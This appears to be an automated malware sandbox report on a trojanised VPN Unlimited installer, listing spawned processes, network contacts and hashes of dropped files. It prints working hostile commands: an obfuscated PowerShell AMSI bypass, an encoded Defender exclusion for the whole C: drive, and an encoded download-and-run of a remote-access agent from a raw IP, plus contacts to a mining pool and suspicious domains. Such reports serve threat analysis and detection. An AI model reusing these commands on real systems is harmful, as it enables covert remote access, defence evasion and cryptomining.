TP,$vwtstPMcRClnUceIyst).Invoke('amsi'+[Char](46)+''+[Char](100)+''+'l'+''+[Char](108)+'');$mJnmKXebqEHOKndpG=$qqybKaIYIHQIQm.Invoke($Null,@([Object]$pshzKNz,[Object](''+'A'+'m'+[Char](115)+''+[Char](105)+''+[Char](83)+''+[Char](99)+'a'+[Char](110)+''+[Char](66)+''+[Char](117)+''+[Char](102)+''+'f'+''+'e'+''+[Char](114)+'')));$cXEIJdurFL=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($AYIPxHKAnWFHgBBLn,$fFCsZzkQJPKvgRTLvVUyqg).Invoke($mJnmKXebqEHOKndpG,[uint32]8,4,[ref]$cXEIJdurFL);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$mJnmKXebqEHOKndpG,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($AYIPxHKAnWFHgBBLn,$fFCsZzkQJPKvgRTLvVUyqg).Invoke($mJnmKXebqEHOKndpG,[uint32]8,0x20,[ref]$cXEIJdurFL);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+'F'+[Char](84)+'W'+[Char](65)+'R'+[Char](69)+'').GetValue('d'+[Char](105)+'a'+'l'+''+[Char](101)+''+[Char](114)+'st'+[Char](97)+''+[Char](103)+''+'e'+'r')).EntryPoint.Invoke($Null,$Null)"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{612eb77d-10c6-4693-ad9d-5e4fea02c350}
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {$script = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('QWRkLU1wUHJlZmVyZW5jZSAtRm9yY2UgLUV4Y2x1c2lvblBhdGggIkM6XCI=')); Invoke-Expression $script}"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {$script = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JHVybCA9ICJodHRwOi8vNDYuOC4yMjcuMTYvdXBsb2Fkcy9tZXNoYWdlbnQzMi1tZXNoLnBuZyIKCiRvdXRwdXQgPSAiJGVudjpURU1QXG1lc2hhZ2VudDMyLW1lc2guZXhlIgoKSW52b2tlLVdlYlJlcXVlc3QgLVVyaSAkdXJsIC1PdXRGaWxlICRvdXRwdXQKCmlmIChUZXN0LVBhdGggJG91dHB1dCkgewogICAgdHJ5IHsKICAgICAgICAkcHJvY2Vzc1N0YXJ0ID0gTmV3LU9iamVjdCBTeXN0ZW0uRGlhZ25vc3RpY3MuUHJvY2Vzc1N0YXJ0SW5mbwogICAgICAgICRwcm9jZXNzU3RhcnQuRmlsZU5hbWUgPSAkb3V0cHV0CiAgICAgICAgJHByb2Nlc3NTdGFydC5Bcmd1bWVudHMgPSAiLWZ1bGxpbnN0YWxsIgogICAgICAgICRwcm9jZXNzU3RhcnQuV2luZG93U3R5bGUgPSBbU3lzdGVtLkRpYWdub3N0aWNzLlByb2Nlc3NXaW5kb3dTdHlsZV06OkhpZGRlbgogICAgICAgIFtTeXN0ZW0uRGlhZ25vc3RpY3MuUHJvY2Vzc106OlN0YXJ0KCRwcm9jZXNzU3RhcnQpCiAgICB9CiAgICBjYXRjaCB7CiAgICB9Cn0KZWxzZSB7CiAKfQ==')); Invoke-Expression $script}"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe
C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding
C:\Windows\SysWOW64\cmd.exe
"cmd" /c "taskkill /IM WireVPNUImpl.exe /F"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\taskkill.exe
taskkill /IM WireVPNUImpl.exe /F
C:\Windows\SysWOW64\cmd.exe
"cmd" /c "taskkill /IM vpn-unlimited.exe /F"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\taskkill.exe
taskkill /IM vpn-unlimited.exe /F
C:\Users\Admin\AppData\Local\Temp\a32ab69f77c0b699954b90cb84dabca5
C:\Users\Admin\AppData\Local\Temp\a32ab69f77c0b699954b90cb84dabca5
C:\Windows\SysWOW64\cmd.exe
"cmd" /c "taskkill /IM vpn-unlimited-launcher.exe /F"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\taskkill.exe
taskkill /IM vpn-unlimited-launcher.exe /F
C:\Windows\SysWOW64\cmd.exe
"cmd" /c "taskkill /IM vpn-unlimited-daemon.exe /F"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\taskkill.exe
taskkill /IM vpn-unlimited-daemon.exe /F
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k WerSvcGroup
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 2888 -ip 2888
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {$script = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('QWRkLU1wUHJlZmVyZW5jZSAtRm9yY2UgLUV4Y2x1c2lvblBhdGggIkM6XCI=')); Invoke-Expression $script}"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2888 -s 92
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{de06eec6-4818-43a6-8102-f6057e43f84d}
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 448 -p 2576 -ip 2576
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 2576 -s 300
C:\Users\Admin\AppData\Local\Temp\is-JFEMB.tmp\VC_redist.x64.exe
"C:\Users\Admin\AppData\Local\Temp\is-JFEMB.tmp\VC_redist.x64.exe" /install /quiet /norestart
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
C:\Windows\Temp\{89C18D32-D6C3-4330-A467-E30AB2ACED1E}\.cr\VC_redist.x64.exe
"C:\Windows\Temp\{89C18D32-D6C3-4330-A467-E30AB2ACED1E}\.cr\VC_redist.x64.exe" -burn.clean.room="C:\Users\Admin\AppData\Local\Temp\is-JFEMB.tmp\VC_redist.x64.exe" -burn.filehandle.attached=724 -burn.filehandle.self=728 /install /quiet /norestart
C:\Windows\Temp\{EFD9F19E-3118-4812-952D-3DDA554BA588}\.be\VC_redist.x64.exe
"C:\Windows\Temp\{EFD9F19E-3118-4812-952D-3DDA554BA588}\.be\VC_redist.x64.exe" -q -burn.elevated BurnPipe.{6C2E67EE-226C-478D-A0FE-6759E7EF27A8} {E4EEE1B2-E834-486A-9681-45E71D07E37B} 1256
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{F32D97DF-E3E5-4CB9-9E3E-0EB5B4E49801}
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k swprv
C:\Users\Admin\AppData\Local\Temp\meshagent32-mesh.exe
"C:\Users\Admin\AppData\Local\Temp\meshagent32-mesh.exe" -fullinstall
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Program Files (x86)\Mesh Agent\MeshAgent.exe
"C:\Program Files (x86)\Mesh Agent\MeshAgent.exe"
C:\Windows\SysWOW64\wbem\wmic.exe
wmic SystemEnclosure get ChassisTypes
C:\Windows\SysWOW64\wbem\wmic.exe
wmic os get oslanguage /FORMAT:LIST
C:\Windows\SysWOW64\wbem\wmic.exe
wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
C:\Windows\SysWOW64\wbem\wmic.exe
wmic os get oslanguage /FORMAT:LIST
C:\Windows\SysWOW64\wbem\wmic.exe
wmic SystemEnclosure get ChassisTypes
C:\Windows\SysWOW64\wbem\wmic.exe
wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
C:\Windows\system32\srtasks.exe
C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2
C:\Users\Admin\AppData\Local\Temp\a32ab69f77c0b699954b90cb84dabca5
"C:\Users\Admin\AppData\Local\Temp\a32ab69f77c0b699954b90cb84dabca5"
C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
C:\Program Files (x86)\Mesh Agent\MeshAgent.exe
"C:\Program Files (x86)\Mesh Agent\MeshAgent.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 384 -p 5576 -ip 5576
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5576 -s 1356
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 188 -p 5576 -ip 5576
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5576 -s 1376
C:\Windows\SysWOW64\wbem\wmic.exe
wmic SystemEnclosure get ChassisTypes
C:\Windows\SysWOW64\wbem\wmic.exe
wmic os get oslanguage /FORMAT:LIST
C:\Windows\SysWOW64\wbem\wmic.exe
wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
C:\Windows\SysWOW64\wbem\wmic.exe
wmic SystemEnclosure get ChassisTypes
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\wbem\wmic.exe
wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
C:\ProgramData\Package Cache\{57a73df6-4ba9-4c1d-bbbb-517289ff6c13}\VC_redist.x64.exe
"C:\ProgramData\Package Cache\{57a73df6-4ba9-4c1d-bbbb-517289ff6c13}\VC_redist.x64.exe" -uninstall -quiet -burn.related.upgrade -burn.ancestors={8bdfe669-9705-4184-9368-db9ce581e0e7} -burn.filehandle.self=1140 -burn.embedded BurnPipe.{67D12AAD-89BC-4752-A635-BC93BB8D8B52} {1DAC1AC4-FEA7-4ADF-A28E-C8A87723B15E} 4648
C:\ProgramData\Package Cache\{57a73df6-4ba9-4c1d-bbbb-517289ff6c13}\VC_redist.x64.exe
"C:\ProgramData\Package Cache\{57a73df6-4ba9-4c1d-bbbb-517289ff6c13}\VC_redist.x64.exe" -burn.clean.room="C:\ProgramData\Package Cache\{57a73df6-4ba9-4c1d-bbbb-517289ff6c13}\VC_redist.x64.exe" -burn.filehandle.attached=576 -burn.filehandle.self=596 -uninstall -quiet -burn.related.upgrade -burn.ancestors={8bdfe669-9705-4184-9368-db9ce581e0e7} -burn.filehandle.self=1140 -burn.embedded BurnPipe.{67D12AAD-89BC-4752-A635-BC93BB8D8B52} {1DAC1AC4-FEA7-4ADF-A28E-C8A87723B15E} 4648
C:\ProgramData\Package Cache\{57a73df6-4ba9-4c1d-bbbb-517289ff6c13}\VC_redist.x64.exe
"C:\ProgramData\Package Cache\{57a73df6-4ba9-4c1d-bbbb-517289ff6c13}\VC_redist.x64.exe" -q -burn.elevated BurnPipe.{84A4313E-8E2A-45AA-9D9E-9BEF00D27F73} {A9309FD9-760D-4B1F-A8AC-07BA15979D85} 6024
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C ""C:\Users\Admin\AppData\Local\Temp\is-JFEMB.tmp\firewall_exception.bat" "C:\Program Files (x86)\VPN Unlimited\vpn-unlimited.exe" "C:\Program Files (x86)\VPN Unlimited\openvpn.exe""
C:\Program Files (x86)\VPN Unlimited\vpn-unlimited-daemon.exe
"C:\Program Files (x86)\VPN Unlimited\vpn-unlimited-daemon.exe" -install
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall delete rule name="VPN Unlimited"
C:\Program Files (x86)\VPN Unlimited\vpn-unlimited-daemon.exe
"C:\Program Files (x86)\VPN Unlimited\vpn-unlimited-daemon.exe" -start
C:\Program Files (x86)\VPN Unlimited\vpn-unlimited-daemon.exe
"C:\Program Files (x86)\VPN Unlimited\vpn-unlimited-daemon.exe"
C:\Windows\SysWOW64\msiexec.exe
"msiexec.exe" /uninstall "C:\Users\Admin\AppData\Local\Temp\is-JFEMB.tmp\TunSetupVPNU.msi" /quiet
C:\Windows\SysWOW64\sc.exe
"C:\Windows\system32\sc.exe" create VPNUSplitTunnel type= kernel binPath= "C:\Program Files (x86)\VPN Unlimited\VpnuDriver\VpnuDriver.sys"
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall delete rule name="OpenVPN"
C:\Program Files (x86)\VPN Unlimited\vpnu-push.exe
"C:\Program Files (x86)\VPN Unlimited\vpnu-push.exe" --only-create-shortcut
C:\Program Files (x86)\VPN Unlimited\recovery\tap\x64\tapinstall.exe
"C:\Program Files (x86)\VPN Unlimited\recovery\tap\x64\tapinstall.exe" /r remove =net *Wintun
C:\Program Files (x86)\VPN Unlimited\recovery\tap\x64\tapinstall.exe
"C:\Program Files (x86)\VPN Unlimited\recovery\tap\x64\tapinstall.exe" /r remove =net *WireGuard
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="VPN Unlimited" dir=in action=allow program="C:\Program Files (x86)\VPN Unlimited\vpn-unlimited.exe" enable=yes
C:\Program Files (x86)\VPN Unlimited\recovery\tap\x64\tapinstall.exe
"C:\Program Files (x86)\VPN Unlimited\recovery\tap\x64\tapinstall.exe" remove tap0901
C:\Program Files (x86)\VPN Unlimited\recovery\tap\x64\tapinstall.exe
"C:\Program Files (x86)\VPN Unlimited\recovery\tap\x64\tapinstall.exe" install OemVista.inf tap0901
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="VPN Unlimited" dir=out action=allow program="C:\Program Files (x86)\VPN Unlimited\vpn-unlimited.exe" enable=yes
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s DeviceInstall
C:\Windows\system32\DrvInst.exe
DrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{f22e1a6f-710a-5048-bd80-6329e477a3ab}\oemvista.inf" "9" "4d14a44ff" "0000000000000148" "WinSta0\Default" "0000000000000160" "208" "c:\program files (x86)\vpn unlimited\recovery\tap\x64"
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="OpenVPN" dir=in action=allow program="C:\Program Files (x86)\VPN Unlimited\openvpn.exe" enable=yes
C:\Windows\system32\DrvInst.exe
DrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem3.inf" "oem3.inf:3beb73aff103cc24:tap0901.ndi:9.24.6.601:tap0901," "4d14a44ff" "0000000000000194"
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="OpenVPN" dir=out action=allow program="C:\Program Files (x86)\VPN Unlimited\openvpn.exe" enable=yes
C:\Program Files (x86)\Mesh Agent\MeshAgent.exe
"C:\Program Files (x86)\Mesh Agent\MeshAgent.exe"
C:\Windows\SysWOW64\wbem\wmic.exe
wmic SystemEnclosure get ChassisTypes
C:\Windows\SysWOW64\wbem\wmic.exe
wmic os get oslanguage /FORMAT:LIST
C:\Windows\SysWOW64\wbem\wmic.exe
wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
C:\Windows\SysWOW64\wbem\wmic.exe
wmic SystemEnclosure get ChassisTypes
C:\Windows\SysWOW64\wbem\wmic.exe
wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x4 /state0:0xa3877855 /state1:0x41c64e6d
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 150.171.27.10:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 2.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | 235.3.20.104.in-addr.arpa | udp |
| CZ | 46.8.227.16:80 | 46.8.227.16 | tcp |
| US | 8.8.8.8:53 | 16.227.8.46.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.supportxmr.com | udp |
| FR | 141.94.96.144:443 | pool.supportxmr.com | tcp |
| US | 8.8.8.8:53 | 144.96.94.141.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rentry.co | udp |
| US | 104.26.3.16:443 | rentry.co | tcp |
| US | 8.8.8.8:53 | justpaste.it | udp |
| PL | 83.168.108.45:443 | justpaste.it | tcp |
| US | 8.8.8.8:53 | 16.3.26.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | jaiodsnvzxkxcz5hvxzkighiwagfew9oi0d3219v687dyfsdg.su | udp |
| US | 104.21.19.3:443 | jaiodsnvzxkxcz5hvxzkighiwagfew9oi0d3219v687dyfsdg.su | tcp |
| US | 8.8.8.8:53 | 45.108.168.83.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.19.21.104.in-addr.arpa | udp |
| CZ | 46.8.227.16:80 | 46.8.227.16 | tcp |
| US | 8.8.8.8:53 | 56.163.245.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 27.117.19.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| DE | 193.233.254.155:443 | tcp | |
| US | 8.8.8.8:53 | 155.254.233.193.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 167.205.23.2.in-addr.arpa | udp |
| US | 104.21.19.3:443 | jaiodsnvzxkxcz5hvxzkighiwagfew9oi0d3219v687dyfsdg.su | tcp |
| US | 8.8.8.8:53 | bellykmrebk.site | udp |
| US | 8.8.8.8:53 | famikyjdiag.site | udp |
| US | 8.8.8.8:53 | possiwreeste.site | udp |
| US | 8.8.8.8:53 | commandejorsk.site | udp |
| US | 8.8.8.8:53 | underlinemdsj.site | udp |
| US | 8.8.8.8:53 | agentyanlark.site | udp |
| US | 8.8.8.8:53 | writekdmsnu.site | udp |
| US | 8.8.8.8:53 | delaylacedmn.site | udp |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| GB | 104.82.234.109:443 | steamcommunity.com | tcp |
| US | 8.8.8.8:53 | sergei-esenin.com | udp |
| US | 104.21.53.8:443 | sergei-esenin.com | tcp |
| US | 8.8.8.8:53 | 109.234.82.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.53.21.104.in-addr.arpa | udp |
| DE | 193.233.254.155:443 | tcp | |
| US | 8.8.8.8:53 | 43.229.111.52.in-addr.arpa | udp |
| DE | 193.233.254.155:443 | tcp | |
| US | 8.8.8.8:53 | 17.173.189.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\jgt.exe
| MD5 | 1417d38c40d85d1c4eb7fad3444ca069 |
| SHA1 | 27d8e2ca9537c80d1c1148830f9a6499f1e3e797 |
| SHA256 | 5f7c6cdea3c4e825af1d796cbd34b2d45b2b6fabed130e717a30a6d871993f5d |
| SHA512 | a169f8c5925977a984bc00a2b379205ed527777865215e4ffdfeb30084d1ed08f7bb5222db8898161f1e6151d4a75e8ccc366543cf041e47effc21dcf4c351ab |
memory/5080-57-0x0000000000400000-0x00000000004F2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\is-P6PGS.tmp\VPN_Unlimited_v9.3.2_64.tmp
| MD5 | 5b16ce0d91e8e275b88fec9fe288d519 |
| SHA1 | 6a22411e2b9e50300e5be2bbabaa136ce3cc7ef5 |
| SHA256 | 4c8ca58ccee5032b2529103636cbea664c401a287a296493a477d9619852eeaa |
| SHA512 | 00643260f19396df1b44cce93cca8d6c636fc89741e301ee163a84321ee59e455453904f92e81a6b8f9a28a100d03275e997bfebd6390cb00870947b21a28b3c |
C:\Users\Admin\AppData\Roaming\Installer\jre\bin\javaw.exe
| MD5 | 48c96771106dbdd5d42bba3772e4b414 |
| SHA1 | e84749b99eb491e40a62ed2e92e4d7a790d09273 |
| SHA256 | a96d26428942065411b1b32811afd4c5557c21f1d9430f3696aa2ba4c4ac5f22 |
| SHA512 | 9f891c787eb8ceed30a4e16d8e54208fa9b19f72eeec55b9f12d30dc8b63e5a798a16b1ccc8cea3e986191822c4d37aedb556e534d2eb24e4a02259555d56a2c |
C:\Users\Admin\AppData\Roaming\Installer\jre\lib\i386\jvm.cfg
| MD5 | 9fd47c1a487b79a12e90e7506469477b |
| SHA1 | 7814df0ff2ea1827c75dcd73844ca7f025998cc6 |
| SHA256 | a73aea3074360cf62adedc0c82bc9c0c36c6a777c70da6c544d0fba7b2d8529e |
| SHA512 | 97b9d4c68ac4b534f86efa9af947763ee61aee6086581d96cbf7b3dbd6fd5d9db4b4d16772dce6f347b44085cef8a6ea3bfd3b84fbd9d4ef763cef39255fbce3 |
C:\Users\Admin\AppData\Roaming\Installer\jre\bin\msvcr100.dll
| MD5 | bf38660a9125935658cfa3e53fdc7d65 |
| SHA1 | 0b51fb415ec89848f339f8989d323bea722bfd70 |
| SHA256 | 60c06e0fa4449314da3a0a87c1a9d9577df99226f943637e06f61188e5862efa |
| SHA512 | 25f521ffe25a950d0f1a4de63b04cb62e2a3b0e72e7405799586913208bf8f8fa52aa34e96a9cc6ee47afcd41870f3aa0cd8289c53461d1b6e792d19b750c9a1 |
C:\Users\Admin\AppData\Roaming\Installer\jre\bin\client\jvm.dll
| MD5 | 39c302fe0781e5af6d007e55f509606a |
| SHA1 | 23690a52e8c6578de6a7980bb78aae69d0f31780 |
| SHA256 | b1fbdbb1e4c692b34d3b9f28f8188fc6105b05d311c266d59aa5e5ec531966bc |
| SHA512 | 67f91a75e16c02ca245233b820df985bd8290a2a50480dff4b2fd2695e3cf0b4534eb1bf0d357d0b14f15ce8bd13c82d2748b5edd9cc38dc9e713f5dc383ed77 |
C:\Users\Admin\AppData\Roaming\Installer\jre\bin\verify.dll
| MD5 | de2167a880207bbf7464bcd1f8bc8657 |
| SHA1 | 0ff7a5ea29c0364a1162a090dffc13d29bc3d3c7 |
| SHA256 | fd856ea783ad60215ce2f920fcb6bb4e416562d3c037c06d047f1ec103cd10b3 |
| SHA512 | bb83377c5cff6117cec6fbadf6d40989ce1ee3f37e4ceba17562a59ea903d8962091146e2aa5cc44cfdddf280da7928001eea98abf0c0942d69819b2433f1322 |
C:\Users\Admin\AppData\Roaming\Installer\jre\bin\zip.dll
| MD5 | cb99b83bbc19cd0e1c2ec6031d0a80bc |
| SHA1 | 927e1e24fd19f9ca8b5191ef3cc746b74ab68bcd |
| SHA256 | 68148243e3a03a3a1aaf4637f054993cb174c04f6bd77894fe84d74af5833bec |
| SHA512 | 29c4978fa56f15025355ce26a52bdf8197b8d8073a441425df3dfc93c7d80d36755cc05b6485dd2e1f168df2941315f883960b81368e742c4ea8e69dd82fa2ba |
C:\Users\Admin\AppData\Roaming\Installer\jre\bin\java.dll
| MD5 | 73bd0b62b158c5a8d0ce92064600620d |
| SHA1 | 63c74250c17f75fe6356b649c484ad5936c3e871 |
| SHA256 | e7b870deb08bc864fa7fd4dec67cef15896fe802fafb3009e1b7724625d7da30 |
| SHA512 | eba1cf977365446b35740471882c5209773a313de653404a8d603245417d32a4e9f23e3b6cd85721143d2f9a0e46ed330c3d8ba8c24aee390d137f9b5cd68d8f |
C:\Users\Admin\AppData\Roaming\Installer\jre\lib\meta-index
| MD5 | 91aa6ea7320140f30379f758d626e59d |
| SHA1 | 3be2febe28723b1033ccdaa110eaf59bbd6d1f96 |
| SHA256 | 4af21954cdf398d1eae795b6886ca2581dac9f2f1d41c98c6ed9b5dbc3e3c1d4 |
| SHA512 | 03428803f1d644d89eb4c0dcbdea93acaac366d35fc1356ccabf83473f4fef7924edb771e44c721103cec22d94a179f092d1bfd1c0a62130f076eb82a826d7cb |
C:\Users\Admin\AppData\Roaming\Installer\jre\lib\ext\meta-index
| MD5 | 77abe2551c7a5931b70f78962ac5a3c7 |
| SHA1 | a8bb53a505d7002def70c7a8788b9a2ea8a1d7bc |
| SHA256 | c557f0c9053301703798e01dc0f65e290b0ae69075fb49fcc0e68c14b21d87f4 |
| SHA512 | 9fe671380335804d4416e26c1e00cded200687db484f770ebbdb8631a9c769f0a449c661cb38f49c41463e822beb5248e69fd63562c3d8c508154c5d64421935 |
C:\Users\Admin\AppData\Roaming\Installer\lib\asm-all.jar
| MD5 | f5ad16c7f0338b541978b0430d51dc83 |
| SHA1 | 2ea49e08b876bbd33e0a7ce75c8f371d29e1f10a |
| SHA256 | 7fbffbc1db3422e2101689fd88df8384b15817b52b9b2b267b9f6d2511dc198d |
| SHA512 | 82e6749f4a6956f5b8dd5a5596ca170a1b7ff4e551714b56a293e6b8c7b092cbec2bec9dc0d9503404deb8f175cbb1ded2e856c6bc829411c8ed311c1861336a |
C:\Users\Admin\AppData\Roaming\Installer\lib\dn-compiled-module.jar
| MD5 | bd1f1a2246004487d4c84a233cea37f7 |
| SHA1 | 24b9e6f765da1bcd2d424fd28b68fc40e368520e |
| SHA256 | 5183a2bca7735453b7fd5ca57ebb47ad32dd82d830eaddafed50a658164bdd76 |
| SHA512 | 800e6a5dd529e9627320c7989720c0086a76ca7fbca6d3ccfcfea04871017a0f212926ccf3b4c16c958615e5ca0db19a53ccee53f17034384eb8c9c933e7608c |
C:\Users\Admin\AppData\Roaming\Installer\lib\dn-php-sdk.jar
| MD5 | 3e5e8cccff7ff343cbfe22588e569256 |
| SHA1 | 66756daa182672bff27e453eed585325d8cc2a7a |
| SHA256 | 0f26584763ef1c5ec07d1f310f0b6504bc17732f04e37f4eb101338803be0dc4 |
| SHA512 | 8ea5f31e25c3c48ee21c51abe9146ee2a270d603788ec47176c16acac15dad608eef4fa8ca0f34a1bbc6475c29e348bd62b0328e73d2e1071aaa745818867522 |
C:\Users\Admin\AppData\Roaming\Installer\lib\jphp-gui-ext.jar
| MD5 | 6696368a09c7f8fed4ea92c4e5238cee |
| SHA1 | f89c282e557d1207afd7158b82721c3d425736a7 |
| SHA256 | c25d7a7b8f0715729bccb817e345f0fdd668dd4799c8dab1a4db3d6a37e7e3e4 |
| SHA512 | 0ab24f07f956e3cdcd9d09c3aa4677ff60b70d7a48e7179a02e4ff9c0d2c7a1fc51624c3c8a5d892644e9f36f84f7aaf4aa6d2c9e1c291c88b3cff7568d54f76 |
C:\Users\Admin\AppData\Roaming\Installer\lib\jphp-desktop-ext.jar
| MD5 | b50e2c75f5f0e1094e997de8a2a2d0ca |
| SHA1 | d789eb689c091536ea6a01764bada387841264cb |
| SHA256 | cf4068ebb5ecd47adec92afba943aea4eb2fee40871330d064b69770cccb9e23 |
| SHA512 | 57d8ac613805edada6aeba7b55417fd7d41c93913c56c4c2c1a8e8a28bbb7a05aade6e02b70a798a078dc3c747967da242c6922b342209874f3caf7312670cb0 |
C:\Users\Admin\AppData\Roaming\Installer\lib\jphp-core.jar
| MD5 | 7e5e3d6d352025bd7f093c2d7f9b21ab |
| SHA1 | ad9bfc2c3d70c574d34a752c5d0ebcc43a046c57 |
| SHA256 | 5b37e8ff2850a4cbb02f9f02391e9f07285b4e0667f7e4b2d4515b78e699735a |
| SHA512 | c19c29f8ad8b6beb3eed40ab7dc343468a4ca75d49f1d0d4ea0b4a5cee33f745893fba764d35c8bd157f7842268e0716b1eb4b8b26dcf888fb3b3f4314844aad |
C:\Users\Admin\AppData\Roaming\Installer\lib\jphp-app-framework.jar
| MD5 | 0c8768cdeb3e894798f80465e0219c05 |
| SHA1 | c4da07ac93e4e547748ecc26b633d3db5b81ce47 |
| SHA256 | 15f36830124fc7389e312cf228b952024a8ce8601bf5c4df806bc395d47db669 |
| SHA512 | 35db507a3918093b529547e991ab6c1643a96258fc95ba1ea7665ff762b0b8abb1ef732b3854663a947effe505be667bd2609ffcccb6409a66df605f971da106 |
C:\Users\Admin\AppData\Roaming\Installer\lib\gson.jar
| MD5 | 5134a2350f58890ffb9db0b40047195d |
| SHA1 | 751f548c85fa49f330cecbb1875893f971b33c4e |
